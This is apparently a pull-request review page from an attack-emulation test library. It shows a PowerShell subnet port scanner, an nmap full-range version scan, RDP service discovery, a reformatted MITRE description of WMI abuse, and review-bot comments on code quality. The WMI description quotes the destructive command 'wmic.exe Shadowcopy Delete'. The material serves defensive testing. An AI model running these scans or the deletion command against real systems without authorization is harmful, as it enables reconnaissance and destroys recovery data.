$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
name: powershell
- name: Remote Desktop Services Discovery via PowerShell
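Review bot: the `else { Write-Host "[Error] Invalid Inputs"; exit 1 }` branch is unreachable: `elseif ($ipAddr -notlike "*,*")` is the exact negation of the preceding `if ($ipAddr -like "*,*")`, so every string lands in one of the first two branches. Either make it a plain `else` or turn it into real validation, e.g. reject entries that fail `[System.Net.IPAddress]::TryParse` before any connection is attempted. The two branches also duplicate the entire connect loop (`New-Object Net.Sockets.TcpClient` / `ConnectAsync(...).Wait(#{timeout_ms})` / `Connected` check); building the target list first and running a single `foreach ($ip in $targets)` afterwards would halve the block and keep the timeout and close logic in one place. Finally, `$tcp` is only closed on a successful connect; adding `$tcp.Dispose()` after the `if ($tcp.Connected)` check avoids leaking a socket per attempt across 254 hosts times every port in `#{port_list}`.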
@@ -256,3 +277,32 @@ atomic_tests:
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
name: powershell
elevation_required: true
- name: Port Scan using nmap (Port range)
auto_generated_guid: 0d5a2b03-3a26-45e4-96ae-89485b4d1f97
description: |
Scan multiple ports to check for listening ports with nmap
supported_platforms:
- linux
- macos
input_arguments:
host:
description: Host(s) to scan.
type: string
default: "127.0.0.1"
port_range:
description: Port range(s) to scan.
type: string
default: "0-65535"
dependency_executor_name: sh
dependencies:
- description: |
Check if nmap command exists on the machine
prereq_command: |
if [ -x "$(command -v nmap)" ]; then exit 0; else exit 1; fi;
get_prereq_command: |
(which yum && yum -y install epel-release nmap)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y nmap)||(which pkg && pkg install -y nmap)||(which brew && brew install nmap)
executor:
command: |
nmap -Pn -sV -p #{port_range} #{host}
elevation_required: true
name: sh
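Review bot: the default `port_range` of `0-65535` combined with `-sV` makes the default run slow even against `127.0.0.1`, since version probing is attempted on every open port; consider a narrower default such as `1-1024` or state the expected run time in the description. `elevation_required: true` is stricter than needed: `nmap -Pn -sV` works unprivileged (without raw-socket access nmap falls back from SYN scan to a TCP connect scan), so the test only needs root if a SYN scan is specifically wanted. The description could also mention that `-Pn` skips host discovery, which is why a host that does not answer pings is still scanned.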
+6 -2
@@ -1,12 +1,16 @@
# T1047 - Windows Management Instrumentation
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1047)
<blockquote>Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is designed for programmers and is the infrastructure for management data and operations on Windows systems.(Citation: WMI 1-3) WMI is an administration feature that provides a uniform environment to access Windows system components.
<blockquote>
Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is designed for programmers and is the infrastructure for management data and operations on Windows systems.(Citation: WMI 1-3) WMI is an administration feature that provides a uniform environment to access Windows system components.
The WMI service enables both local and remote access, though the latter is facilitated by [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) and [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006).(Citation: WMI 1-3) Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.(Citation: WMI 1-3) (Citation: Mandiant WMI)
An adversary can use WMI to interact with local and remote systems and use it as a means to execute various behaviors, such as gathering information for [Discovery](https://attack.mitre.org/tactics/TA0007) as well as [Execution](https://attack.mitre.org/tactics/TA0002) of commands and payloads.(Citation: Mandiant WMI) For example, `wmic.exe` can be abused by an adversary to delete shadow copies with the command `wmic.exe Shadowcopy Delete` (i.e., [Inhibit System Recovery](https://attack.mitre.org/techniques/T1490)).(Citation: WMI 6)
**Note:** `wmic.exe` is deprecated as of January of 2024, with the WMIC feature being “disabled by default” on Windows 11+. WMIC will be removed from subsequent Windows releases and replaced by [PowerShell](https://attack.mitre.org/techniques/T1059/001) as the primary WMI interface.(Citation: WMI 7,8) In addition to PowerShell and tools like `wbemtool.exe`, COM APIs can also be used to programmatically interact with WMI via C++, .NET, VBScript, etc.(Citation: WMI 7,8)</blockquote>
**Note:** `wmic.exe` is deprecated as of January of 2024, with the WMIC feature being “disabled by default” on Windows 11+. WMIC will be removed from subsequent Windows releases and replaced by [PowerShell](https://attack.mitre.org/techniques/T1059/001) as the primary WMI interface.(Citation: WMI 7,8) In addition to PowerShell and tools like `wbemtool.exe`, COM APIs can also be used to programmatically interact with WMI via C++, .NET, VBScript, etc.(Citation: WMI 7,8)
</blockquote>
## Atomic Tests

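Review bot: splitting `<blockquote>` and `</blockquote>` onto their own lines is a rendering fix, not just whitespace: with `<blockquote>Adversaries may abuse ...` on one line, CommonMark treats everything up to the next blank line as a raw HTML block, so the `[Remote Services](https://attack.mitre.org/techniques/T1021)` links and the `**Note:**` bold inside it are emitted literally. With the tags on separate lines, each separated from the text by a blank line (the extra lines in the `-12 +16` count suggest that layout is present), the paragraphs in between are parsed as Markdown again. If this Markdown is produced by a generator, the template is where the change needs to live so the next regeneration does not revert it.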
Some files were not shown because too many files have changed in this diff.